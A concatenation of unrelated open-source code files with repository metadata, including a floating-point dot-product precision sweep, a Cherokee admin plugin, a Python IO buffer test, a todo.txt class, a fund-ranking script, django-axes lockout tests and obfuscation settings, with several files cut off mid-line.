self.scheduler.duplicate_file(self.thumbnail)
for f in self.files:
f.duplicate()
for alb in self.subalbums:
alb.duplicate()
|
billzorn/fpunreal
|
titanfp/vec_sweep.py
|
Python
|
mit
| 11,896
| 0.00269
|
import math
import random
import operator
import traceback
from .titanic import ndarray
from .fpbench import fpcparser
from .arithmetic import mpmf, ieee754, posit, fixed, evalctx, analysis
from .arithmetic.mpmf import Interpreter
from .sweep import search
from .sweep.utils import *
dotprod_naive_template = '''(FPCore dotprod ((A n) (B m))
:pre (== n m)
{overall_prec}
(for ([i n])
([accum 0 (! {sum_prec} (+ accum
(! {mul_prec} (* (ref A i) (ref B i)))))])
(cast accum)))
'''
dotprod_fused_template = '''(FPCore dotprod ((A n) (B m))
:pre (== n m)
{overall_prec}
(for ([i n])
([accum 0 (! {sum_prec} (fma (ref A i) (ref B i) accum))])
(cast accum)))
'''
dotprod_fused_unrounded_template = '''(FPCore dotprod ((A n) (B m))
:pre (== n m)
{overall_prec}
(for ([i n])
([accum 0 (! {sum_prec} (fma (ref A i) (ref B i) accum))])
accum))
'''
binsum_template = '''(FPCore addpairs ((A n))
:pre (> n 1)
(tensor ([i (# (/ (+ n 1) 2))])
(let* ([k1 (# (* i 2))]
[k2 (# (+ k1 1))])
(if (< k2 n)
(! {sum_prec} (+ (ref A k1) (ref A k2)))
(ref A k1)))
))
(FPCore binsum ((A n))
(while (> (size B 0) 1)
([B A (addpairs B)])
(if (== (size B 0) 0) 0 (ref B 0))))
'''
nksum_template = '''(FPCore nksum ((A n))
:name "Neumaier's improved Kahan Summation algorithm"
{sum_prec}
(for* ([i n])
([elt 0 (ref A i)]
[t 0 (+ accum elt)]
[c 0 (if (>= (fabs accum) (fabs elt))
(+ c (+ (- accum t) elt))
(+ c (+ (- elt t) accum)))]
[accum 0 t])
(+ accum c)))
'''
vec_prod_template = '''(FPCore vec-prod ((A n) (B m))
:pre (== n m)
(tensor ([i n])
(! {mul_prec} (* (ref A i) (ref B i)))))
'''
dotprod_bin_template = (
binsum_template + '\n' +
vec_prod_template + '\n' +
'''(FPCore dotprod ((A n) (B m))
:pre (== n m)
(let ([result (binsum (vec-prod A B))])
(! {overall_prec} (cast result))))
''')
dotprod_neumaier_template = (
nksum_template + '\n' +
vec_prod_template + '\n' +
'''(FPCore dotprod ((A n) (B m))
:pre (== n m)
(let ([result (nksum (vec-prod A B))])
(! {overall_prec} (cast result))))
''')
def mk_dotprod(template, overall_prec, mul_prec, sum_prec):
return template.format(overall_prec=overall_prec,
mul_prec=mul_prec,
sum_prec=sum_prec)
def largest_representable(ctx):
if isinstance(ctx, evalctx.IEEECtx):
return mpmf.MPMF(ctx.fbound, ctx)
elif isinstance(ctx, evalctx.PositCtx):
return mpmf.MPMF(m=1, exp=ctx.emax, ctx=ctx)
else:
raise ValueError(f'unsupported type: {type(ctx)!r}')
def smallest_representable(ctx):
if isinstance(ctx, evalctx.IEEECtx):
return mpmf.MPMF(m=1, exp=ctx.n + 1, ctx=ctx)
elif isinstance(ctx, evalctx.PositCtx):
return mpmf.MPMF(m=1, exp=ctx.emin, ctx=ctx)
else:
raise ValueError(f'unsupported type: {type(ctx)!r}')
def safe_mul_ctx(ctx):
if isinstance(ctx, evalctx.IEEECtx):
safe_es = ctx.es + 2
safe_p = (ctx.p + 1) * 2
return ieee754.ieee_ctx(safe_es, safe_es + safe_p)
elif isinstance(ctx, evalctx.PositCtx):
# very conservative; not a posit ctx
log_emax = ctx.emax.bit_length()
safe_es = log_emax + 2
safe_p = (ctx.p + 1) * 2
return ieee754.ieee_ctx(safe_es, safe_es + safe_p)
else:
raise ValueError(f'unsupported type: {type(ctx)!r}')
def safe_quire_ctx(ctx, log_carries = 30):
mul_ctx = safe_mul_ctx(ctx)
|
largest = largest_representable(ctx)
largest_squared = largest.mul(largest, ctx=mul_ctx)
smallest = smallest_representable(ctx)
smallest_squared = smallest.mul(smallest, ctx=mul_ctx)
# check
assert largest_squared.inexact is False and smallest_squared.inexact is False
left = largest_squared.e +
|
1 + log_carries
right = smallest_squared.e
quire_type = fixed.fixed_ctx(right, left - right)
# check
assert not fixed.Fixed._round_to_context(largest_squared, ctx=quire_type).isinf
assert not fixed.Fixed._round_to_context(smallest_squared, ctx=quire_type).is_zero()
return quire_type
def round_vec(v, ctx):
return ndarray.NDArray([mpmf.MPMF(x, ctx=ctx) for x in v])
def rand_vec(n, ctx=None, signed=True):
if signed:
v = [random.random() if random.randint(0,1) else -random.random() for _ in range(n)]
else:
v = [random.random() for _ in range(n)]
if ctx is None:
return v
else:
return round_vec(v, ctx)
def setup_dotprod(template, precs):
evaltor = Interpreter()
main = load_cores(evaltor, mk_dotprod(template, *precs))
return evaltor, main
def setup_full_quire(ctx, unrounded=False):
qctx = safe_quire_ctx(ctx)
precs = (ctx.propstr(), '', qctx.propstr())
if unrounded:
template = dotprod_fused_unrounded_template
else:
template = dotprod_fused_template
return setup_dotprod(template, precs)
# sweep
# constants: base dtype
# # trials (input data...)
# variables: quire high bits
# quire lo bits
# metrics: ulps
# BAD - globals
class VecSettings(object):
def __init__(self):
self.trials = None
self.n = None
self.As = None
self.Bs = None
self.refs = None
self.template = None
self.overall_ctx = None
self.mul_ctx = None
def cfg(self, trials, n, ctx, template, signed=True):
self.trials = trials
self.n = n
self.As = [rand_vec(n, ctx=ctx, signed=signed) for _ in range(trials)]
self.Bs = [rand_vec(n, ctx=ctx, signed=signed) for _ in range(trials)]
evaltor, main = setup_full_quire(ctx)
self.refs = [evaltor.interpret(main, [a, b]) for a, b in zip(self.As, self.Bs)]
self.template = template
self.overall_ctx = ctx
self.mul_ctx = safe_mul_ctx(ctx)
print(mk_dotprod(template, self.overall_ctx.propstr(), self.mul_ctx.propstr(), safe_quire_ctx(ctx).propstr()))
global_settings = VecSettings()
def describe_stage(quire_lo, quire_hi):
overall_prec = global_settings.overall_ctx.propstr()
mul_prec = global_settings.mul_ctx.propstr()
sum_prec = fixed.fixed_ctx(-quire_lo, quire_lo + quire_hi).propstr()
precs = (overall_prec, mul_prec, sum_prec)
print(mk_dotprod(global_settings.template, *precs))
def vec_stage(quire_lo, quire_hi):
try:
overall_prec = global_settings.overall_ctx.propstr()
mul_prec = global_settings.mul_ctx.propstr()
sum_prec = fixed.fixed_ctx(-quire_lo, quire_lo + quire_hi).propstr()
precs = (overall_prec, mul_prec, sum_prec)
evaltor, main = setup_dotprod(global_settings.template, precs)
worst_ulps = 0
sum_ulps = 0
infs = 0
for a, b, ref in zip(global_settings.As, global_settings.Bs, global_settings.refs):
result = evaltor.interpret(main, [a, b])
if result.is_finite_real():
ulps = abs(linear_ulps(result, ref))
sum_ulps += ulps
if ulps > worst_ulps:
worst_ulps = ulps
else:
worst_ulps = math.inf
sum_ulps = math.inf
infs += 1
avg_ulps = sum_ulps / global_settings.trials
return quire_lo + quire_hi, infs, worst_ulps, avg_ulps
except Exception:
traceback.print_exc()
return math.inf, math.inf, math.inf, math.inf
def init_prec():
return 16
def neighbor_prec(x):
nearby = 5
for neighbor in range(x-nearby, x+nearby+1):
if 1 <= neighbor <= 4096 and neighbor != x:
yield neighbor
vec_inits = (init_prec,) * 2
vec_neighbors = (neighbor_prec,) * 2
vec_metrics = (operator.lt,) * 4
filtered_metrics = (operator.lt, None, None, operator.lt)
def run_sweep(trials, n, ctx, template, signed=True):
global_settings.cfg(trials, n, ctx, template, signed=signed)
frontier = search.sweep_random_init(vec_stage, vec_inits, vec_neighbors, vec_metrics)
filtered_frontier = search.filter_frontier(frontier, filtered_metrics)
sor
|
mdavid/cherokee-webserver-svnclone
|
admin/plugins/wildcard.py
|
Python
|
gpl-2.0
| 3,364
| 0.012485
|
# -*- coding: utf-8 -*-
#
# Cheroke-admin
#
# Authors:
# Alvaro Lopez Ortega <alvaro@alobbs.com>
#
# Copyright (C) 2009-2010 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK
URL_APPLY = '/plugin/wildcard/apply'
NOTE_WILDCARD = N_("Accepted host name. Wildcard characters (* and ?) are allowed. Eg: *example.com")
WARNING_EMPTY = N_("At least one wildcard string must be defined.")
class Content (CTK.Container):
def __init__ (self, refreshable, key, url_apply, **kwargs):
CTK.Container.__init__ (self, **kwargs)
entries = CTK.cfg.keys (key)
# Warning message
if not entries:
notice = CTK.Notice('warning')
notice += CTK.RawHTML (_(WARNING_EMPTY))
self += notice
|
# List
else:
table = CTK.Table()
submit = CTK.Submitter(url_apply)
submit += table
self += CTK.Indenter(submit)
table.set_header(1)
table += [CTK.RawHTML(_('Domain pattern'))]
for i in entries:
e1 = CTK.TextCfg ("%s!%s"%(key,i))
|
rm = None
if len(entries) >= 2:
rm = CTK.ImageStock('del')
rm.bind('click', CTK.JS.Ajax (url_apply,
data = {"%s!%s"%(key,i): ''},
complete = refreshable.JS_to_refresh()))
table += [e1, rm]
# Add New
table = CTK.PropsTable()
next = CTK.cfg.get_next_entry_prefix (key)
table.Add (_('New host name'), CTK.TextCfg(next, False, {'class':'noauto'}), _(NOTE_WILDCARD))
submit = CTK.Submitter(url_apply)
dialog = CTK.Dialog2Buttons ({'title': _('Add new entry')}, _('Add'), submit.JS_to_submit())
submit += table
submit.bind ('submit_success', refreshable.JS_to_refresh())
submit.bind ('submit_success', dialog.JS_to_close())
dialog += submit
self += dialog
add_new = CTK.Button(_('Add New'))
add_new.bind ('click', dialog.JS_to_show())
self += add_new
class Plugin_wildcard (CTK.Plugin):
def __init__ (self, key, vsrv_num):
CTK.Plugin.__init__ (self, key)
pre = '%s!domain' %(key)
url_apply = '%s/%s' %(URL_APPLY, vsrv_num)
self += CTK.RawHTML ("<h2>%s</h2>" % (_('Accepted Domains')))
# Content
refresh = CTK.Refreshable ({'id': 'plugin_wildcard'})
refresh.register (lambda: Content(refresh, pre, url_apply).Render())
self += refresh
# Validation, and Public URLs
CTK.publish ('^%s/[\d]+$'%(URL_APPLY), CTK.cfg_apply_post, method="POST")
|
837468220/python-for-android
|
python3-alpha/python3-src/Lib/test/test_bufio.py
|
Python
|
apache-2.0
| 2,654
| 0.002638
|
import unittest
from test import support
import io # C implementation.
import _pyio as pyio # Python implementation.
# Simple test to ensure that optimizations in the IO library deliver the
# expected results. For best testing, run this under a debug-build Python too
# (to exercise asserts in the C code).
lengths = list(range(1, 257)) + [512, 1000, 1024, 2048, 4096, 8192, 10000,
16384, 32768, 65536, 1000000]
class BufferSizeTest(unittest.TestCase):
def try_one(self, s):
# Write s + "\n" + s to file, then open it and ensure that successive
# .readline()s deliver what we wrote.
# Ensure we can open TESTFN for writing.
support.unlink(support.TESTFN)
# Since C doesn't guarantee we can write/read arbitrary bytes in text
# files, use binary mode.
f = self.open(support.TESTFN, "wb")
try:
# write once with \n and once without
f.write(s)
f.write(b"\n")
f.write(s)
f.close()
f = open(support.TESTFN, "rb")
line = f.readline()
self.assertEqual(line, s + b"\n")
line = f.readline()
self.assertEqual(line, s)
line = f.readline()
self.assertTrue(not line) # Must be at EOF
f.close()
finally:
support.unlink(support.TESTFN)
def drive_one(self, pattern):
for length in lengths:
# Repeat string 'pattern' as often as needed to reach total length
# 'length'. Then call try_one with that string, a string one larger
# than that, and a string one smaller than that. Try this with all
# small sizes and various powers of 2, so we exercise all likely
# stdio buffer sizes, and "off by one" errors on both sides.
q, r = divmod(length, len(pattern))
teststring = pattern * q + pattern[:r]
self.assertEqual(len(teststring), length)
self.try_one(teststring)
self.try_one(teststring + b"x")
self.try_one(teststring[:-1])
def test_primepat(self):
# A pattern with prime length,
|
to avoid simple re
|
lationships with
# stdio buffer sizes.
self.drive_one(b"1234567890\00\01\02\03\04\05\06")
def test_nullpat(self):
self.drive_one(bytes(1000))
class CBufferSizeTest(BufferSizeTest):
open = io.open
class PyBufferSizeTest(BufferSizeTest):
open = staticmethod(pyio.open)
def test_main():
support.run_unittest(CBufferSizeTest, PyBufferSizeTest)
if __name__ == "__main__":
test_main()
|
bram85/topydo
|
topydo/lib/Todo.py
|
Python
|
gpl-3.0
| 3,165
| 0
|
# Topydo - A todo.txt client written in Python.
# Copyright (C) 2014 - 2015 Bram Schoenmakers <bram@topyd
|
o.org>
#
# This
|
program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This module provides the Todo class.
"""
from datetime import date
from topydo.lib.Config import config
from topydo.lib.TodoBase import TodoBase
from topydo.lib.Utils import date_string_to_date
class Todo(TodoBase):
"""
This class adds common functionality with respect to dates to the Todo
base class, mainly by interpreting the start and due dates of task.
"""
def __init__(self, p_str):
TodoBase.__init__(self, p_str)
self.attributes = {}
def get_date(self, p_tag):
""" Given a date tag, return a date object. """
string = self.tag_value(p_tag)
result = None
try:
result = date_string_to_date(string) if string else None
except ValueError:
pass
return result
def start_date(self):
""" Returns a date object of the todo's start date. """
return self.get_date(config().tag_start())
def due_date(self):
""" Returns a date object of the todo's due date. """
return self.get_date(config().tag_due())
def is_active(self):
"""
Returns True when the start date is today or in the past and the
task has not yet been completed.
"""
start = self.start_date()
return not self.is_completed() and (not start or start <= date.today())
def is_overdue(self):
"""
Returns True when the due date is in the past and the task has not
yet been completed.
"""
return not self.is_completed() and self.days_till_due() < 0
def days_till_due(self):
"""
Returns the number of days till the due date. Returns a negative number
of days when the due date is in the past.
Returns 0 when the task has no due date.
"""
due = self.due_date()
if due:
diff = due - date.today()
return diff.days
return 0
def length(self):
"""
Returns the length (in days) of the task, by considering the start date
and the due date. When there is no start date, its creation date is
used. Returns 0 when one of these dates is missing.
"""
start = self.start_date() or self.creation_date()
due = self.due_date()
if start and due and start < due:
diff = due - start
return diff.days
else:
return 0
|
gpanda/abrisk
|
fundlist.py
|
Python
|
gpl-2.0
| 8,887
| 0.000788
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
from __future__ import print_function
__author__ = 'gpanda'
"""References:
[1] easy thread-safe queque, http://pymotw.com/2/Queue/
"""
import argparse
import collections
import fileinput
import os
import pprint
import re
|
import string
import sys
import threading
import time
import Queue
from libs import driver
from libs.common import LOG, is_sec_id, AbriskError
config =
|
{}
class Fund(object):
"""Fund data structure
pbr = price / book value (nav), an important index to sort funds
"""
def __init__(self, secId, name=None, time=None, price=float(0),
volume=float(0), nav=float(1)):
"""Initialize Fund object
:param secId: security id
:param name: name
:param time: data timestamp
:param price: security price
:param volume: exchange volume (unit: 0.1 billion)
:param nav: security (fund) net asset value or book value
"""
self.secId = secId
self.name = name
self.time = time
self.price = price
self.volume = volume
self.nav = nav
self.pbr = self.price / self.nav
def __cmp__(self, other):
return cmp(self.pbr, other.pbr)
def _initialize_input_parser():
parser = argparse.ArgumentParser(
description="Show me interesting funds."
)
parser.add_argument(
'--fin',
default="default.0",
nargs="*",
metavar="FILE",
help="Security list input file."
)
parser.add_argument(
'--workers',
default=5,
nargs="?",
metavar="COUNT",
help="Working thread count."
)
parser.add_argument(
'--head', '-H',
default=0,
nargs="?",
metavar="COUNT",
help="How many items in the top rank to show."
)
parser.add_argument(
'--tail', '-T',
default=0,
nargs="?",
metavar="COUNT",
help="How many items in the bottom rank to show."
)
parser.add_argument(
'--funds', '-f',
nargs="*",
metavar="FUND INDEX",
help="One or more specified funds."
)
parser.add_argument(
'-v', '--verbose',
action="store_true",
help="Show debug messages."
)
return parser
def _parse_input_0(opts):
global config
global LOG
# retrieve fund list files
files = opts['fin']
if not isinstance(files, list):
files = [files]
config['fin'] = files
workers = int(opts['workers'])
if workers > 0:
config['workers'] = workers
head = int(opts['head'])
if head > 0:
config['head'] = head
tail = int(opts['tail'])
if tail > 0:
config['tail'] = tail
funds = opts['funds']
if not isinstance(funds, list):
funds = [funds]
config['funds'] = funds
if opts['verbose']:
config['debug'] = True
LOG.setLevel(logging.DEBUG)
return config
def _parse_input_1(cfg):
"""
TODO: comments
"""
# pprint.pprint(config)
fund_pool = collections.OrderedDict()
files = cfg['fin']
for yaf in files:
if os.path.exists(yaf):
filename = os.path.basename(yaf)
# print("{filename}".format(filename=filename))
fund_pool[filename] = collections.OrderedDict()
for line in fileinput.input(yaf):
if line.startswith("#"):
continue
fields = line.split(',')
sid = string.strip(fields[0])
if is_sec_id(sid):
fund_pool[filename][sid] = [].extend(fields[1:])
funds = config['funds']
if funds[0]:
category = 'Quick_show'
fund_pool[category] = collections.OrderedDict()
for fund in funds:
if is_sec_id(fund):
fund_pool[category][fund] = []
return fund_pool
def work_flow(input_queues, output_queues, error_queues):
"""
TODO: comments
"""
local = threading.local()
local.thread_name = threading.current_thread().getName()
LOG.debug("*** Enters work_flow() >>>")
# print("*** Thread-{0}:{1} *** Enters work_flow >>>"
# .format(local.thread_name, time.time()))
def retrieve_data(sid):
"""
TODO: comments
"""
LOG.debug("Retrieving data for %s", sid)
# print("Thread-{0}: Retrieving data for {1}"
# .format(local.thread_name, sid))
fund_raw_data = driver.getpbr(sid)
if not fund_raw_data:
return None
fund = Fund(sid,
name=fund_raw_data[2],
time=fund_raw_data[0],
price=fund_raw_data[4],
volume=fund_raw_data[5],
nav=fund_raw_data[3],
)
# driver.show(fund_raw_data)
return fund
for c, iq in input_queues.items():
sid=None
try:
LOG.debug("Switching to category %s", c)
# print("Thread-{0}: Switching to category {1}"
# .format(local.thread_name, c))
while not iq.empty():
sid = iq.get(False)
fund = retrieve_data(sid)
if fund:
output_queues[c].put(fund)
LOG.debug("Leaving category %s", c)
# print("Thread-{0}: Leaving category {1}"
# .format(local.thread_name, c))
except Queue.Empty as e:
LOG.info("Unexpected Queue.Empty Exception occurs, %s", e)
except Exception as e:
ename = "T:[" + local.thread_name + "]C:[" + c + "]S:[" + sid + "]"
error_queues[c].put(AbriskError(ename, e))
LOG.debug("*** Exits from work_flow() <<<")
# print("*** Thread-{0} *** Exits from work_flow <<<"
# .format(local.thread_name))
def sync(fund_pool):
"""Central controller of fund data synchronization.
** Preparing working queue (FIFO) and workers for funds of interest.
** Preparing data queue (Heap) for storing and sorting collected data.
** Retrieving fund data, refining and sorting them.
"""
input_queues = {}
output_queues = {}
error_queues = {}
for category, pool in fund_pool.items():
input_queues[category] = Queue.Queue(len(pool))
for sid in sorted(pool.keys()):
input_queues[category].put(sid)
output_queues[category] = Queue.PriorityQueue(len(pool))
error_queues[category] = Queue.Queue(len(pool))
workers = {}
worker_number = config['workers']
for i in range(worker_number):
workers[i] = threading.Thread(
target=work_flow,
name=str(i),
args=[input_queues, output_queues, error_queues],
)
workers[i].start()
for worker in workers.values():
worker.join()
rc = 0
for c, eq in error_queues.items():
if not eq.empty():
rc = 1
break
if rc == 0:
LOG.debug("All jobs have been done without errors.")
else:
LOG.debug("All jobs have been done, but there are errors.")
return output_queues, error_queues, rc
def report_fund_list(out_put_queues):
for category, priority_queue in out_put_queues.items():
LOG.debug("Category-%s", category)
# print("Category-{0}".format(category))
driver.setup_output(0, LOG)
driver.print_header()
while not priority_queue.empty():
fund = priority_queue.get()
driver.print_row((fund.time, fund.secId, fund.name,
fund.nav, fund.price, fund.volume,
fund.pbr))
def show_fund_pool(fund_pool):
for category, pool in fund_pool.items():
LOG.debug("Category %s", category)
# print("Category {category}".format(category=category))
for sid, extras in pool.items():
LOG.debug("%s, %s", sid, extras)
# print("{0}, {1}".format(sid, extras))
def main():
"""
TODO: no comments
"""
parser = _initialize_input_parser
|
dreibh/planetlab-lxc-plcapi
|
PLC/NetworkTypes.py
|
Python
|
bsd-3-clause
| 1,417
| 0.008469
|
#
# Functions for interacting with the network_types table in the database
#
# Mark Huang <mlhuang@cs.princeton.edu>
# Copyright (C) 2006 The Trustees of Princeton University
#
from PLC.Faults import *
from PLC.Parameter import Parameter
from PLC.Table import Row, Table
class NetworkType(Row):
"""
Representation of a row in the network_types table. To use,
instantiate with a dict of values.
"""
table_name =
|
'network_types'
primary_key = 'type'
join_tables = ['interfaces']
fields = {
'type': Parameter(str, "Network type", max = 20),
}
def validate_type(self, name):
# Make sure name i
|
s not blank
if not len(name):
raise PLCInvalidArgument("Network type must be specified")
# Make sure network type does not alredy exist
conflicts = NetworkTypes(self.api, [name])
if conflicts:
raise PLCInvalidArgument("Network type name already in use")
return name
class NetworkTypes(Table):
"""
Representation of the network_types table in the database.
"""
def __init__(self, api, types = None):
Table.__init__(self, api, NetworkType)
sql = "SELECT %s FROM network_types" % \
", ".join(NetworkType.fields)
if types:
sql += " WHERE type IN (%s)" % ", ".join( [ api.db.quote (t) for t in types ] )
self.selectall(sql)
|
hipnusleo/laserjet
|
resource/pypi/cffi-1.9.1/demo/readdir_setup.py
|
Python
|
apache-2.0
| 260
| 0
|
from setuptools import setup
setup(
name="example",
version="0.1",
py_modules=["readdir"],
setup_requires=["cffi>=1.0.dev0"],
|
cffi_modules=["readdir_build.py:ffi"],
install_requires=["cffi>=1.0.dev0"],
|
zip_safe=False,
)
|
jazzband/django-axes
|
tests/test_attempts.py
|
Python
|
mit
| 5,846
| 0
|
from unittest.mock import patch
from django.http import HttpRequest
from django.test import override_settings
from django.utils.timezone import now
from axes.attempts import get_cool_off_threshold
from axes.models import AccessAttempt
from axes.utils import reset, reset_request
from tests.base import AxesTestCase
class GetCoolOffThresholdTestCase(AxesTestCase):
@override_settings(AXES_COOLOFF_TIME=42)
def test_get_cool_off_threshold(self):
timestamp = now()
with patch("axes.
|
attempts.now", return_value=timestamp):
attempt_time = timestamp
threshold_now = get_cool_off_threshold(attempt_time)
attempt_time = None
threshold_none = get_cool_off_threshold(attempt_time)
self.assertEqual(threshold_now, threshold_none)
@override_settings(AXES_COOLOFF_TIME=None)
def test_get_cool_off_threshold_error(self):
with
|
self.assertRaises(TypeError):
get_cool_off_threshold()
class ResetTestCase(AxesTestCase):
def test_reset(self):
self.create_attempt()
reset()
self.assertFalse(AccessAttempt.objects.count())
def test_reset_ip(self):
self.create_attempt(ip_address=self.ip_address)
reset(ip=self.ip_address)
self.assertFalse(AccessAttempt.objects.count())
def test_reset_username(self):
self.create_attempt(username=self.username)
reset(username=self.username)
self.assertFalse(AccessAttempt.objects.count())
class ResetResponseTestCase(AxesTestCase):
USERNAME_1 = "foo_username"
USERNAME_2 = "bar_username"
IP_1 = "127.1.0.1"
IP_2 = "127.1.0.2"
def setUp(self):
super().setUp()
self.create_attempt()
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_1)
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_2)
self.create_attempt(username=self.USERNAME_2, ip_address=self.IP_1)
self.create_attempt(username=self.USERNAME_2, ip_address=self.IP_2)
self.request = HttpRequest()
def test_reset(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
def test_reset_ip(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
def test_reset_username(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
def test_reset_ip_username(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_user_failures(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_ip_user_failures(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_username_user_failures(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_ip_username_user_failures(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_user_or_ip(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_ip_user_or_ip(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_username_user_or_ip(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_ip_username_user_or_ip(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 2)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_user_and_ip(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_ip_user_and_ip(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_username_user_and_ip(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_AND=True)
def test_reset_ip_username_user_and_ip(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
|
rdevost/pymixup
|
common/settings.py
|
Python
|
mit
| 4,238
| 0
|
from os.path import expanduser
######################
# Common project files
######################
# These are files, packages, and folders that will be copied from the
# development folder to the destination obfuscated project.
######################
# Python packages to obfusca
|
te.
obfuscated_packages = [
'controller',
'db',
'dbdata',
'logic',
'migrations',
'platform_api',
'tests',
'view'
]
# Non-python folders and Python packages that are not obfuscated.
# Note: Tests are a special case: both obfuscated and
|
unobfuscated versions
# are desired.
unobfuscated_folders = [
'csvlite',
'fonts',
'help',
'images', 'initial_data', 'international',
'kivygraph',
'tests',
]
# Required files or types in the project directory (that is, the base
# directory in which all the common packages exist in) that must be
# obfuscated. For example, main.py is not in any of the common packages, but
# should be obfuscated and included in the project, so *.py (or alternatively,
# main.py) is included here.
obfuscated_root_files = [
'*.kv',
'*.py',
]
# Required files or types in the project directory that should not be
# obfuscated.
unobfuscated_root_files = [
'*.ini',
'*.txt',
]
#####################
# Default directories
#####################
# A project is moved through directories as follows:
# 1. It is copied into IMPORTED (use import_project/fabfile.py).
# 2. The IMPORTED project is obfuscated and written into OBFUSCATED (run
# pymixup.py).
# 3. When an obfuscated project is ready to test, it is copied into
# EXPORTED for a particular platform (e.g., for ios, use
# export_ios/fabfile.py).
# If no platform is specified, it will be copied into a folder called
# "default".
# 4. When an exported project is deployed, it is copied into DEPLOYED under
# its version number.
#
# Note that files in IMPORTED, OBFUSCATED, and EXPORTED are overwritten with
# each refresh from the development project. When a project is deployed,
# however, a permanent copy is retained under its version number.
#####################
# Project name. This should be the name of the last folder in the project
# path. The name is appended to the directories below.
project_name = 'MyProject'
# The base directory of the project to obfuscate.
# For example, the base directory of a project in '~/projects/MyProject' would
# be '~/projects'
project_base_dir = expanduser('~/PycharmProjects')
# The directory to copy the imported development project files to.
# Make sure this base directory exists; the fabfile scripts expects it.
# The project_name will be appended to the directory.
# For example, specify '~/projects/IMPORTED' to have the files from the
# project MyProject copied into '~/projects/IMPORTED/MyProject'.
imported_dir = expanduser('~/projects/IMPORTED')
# The directory to write the obfuscated files to.
# Make sure this base directory exists; the fabfile scripts expects it.
# The project_name and platform will be appended to the directory.
# For example, if '~/projects/OBFUSCATED' is specified, then the project
# MyProject obfuscated for the android platform will be placed in
# '~/projects/OBFUSCATED/MyProject/android'.
obfuscated_dir = expanduser('~/projects/OBFUSCATED')
# The directory to write the exported files to.
# Make sure this base directory exists; the fabfile scripts expects it.
# The project_name and platform will be appended to the directory.
# For example, if '~/projects/EXPORTED' is specified, then the project
# MyProject exported for the android platform will be placed in
# '~/projects/EXPORTED/MyProject/android'.
exported_dir = expanduser('~/projects/EXPORTED')
# The directory to write the exported files to.
# Make sure this base directory exists; the fabfile scripts expects it.
# For example, if '~/projects/EXPORTED' is specified, then the project
# MyProject deployed for the android platform for version 1.3.2 will be placed
# in '~/projects/DEPLOYED/MyProject/android/1.3.2'.
deployed_dir = expanduser('~/projects/DEPLOYED')
# The directory that contains extra files and folders needed for the project.
extras_dir = expanduser('~/project/EXTRAS')
|
CKboss/TheBauble
|
Tensorflow/CNN/ResNet/imgaug/augmenters.py
|
Python
|
gpl-3.0
| 129,266
| 0.003458
|
from __future__ import print_function, division, absolute_import
from . import imgaug as ia
from .parameters import StochasticParameter, Deterministic, Binomial, Choice, DiscreteUniform, Normal, Uniform
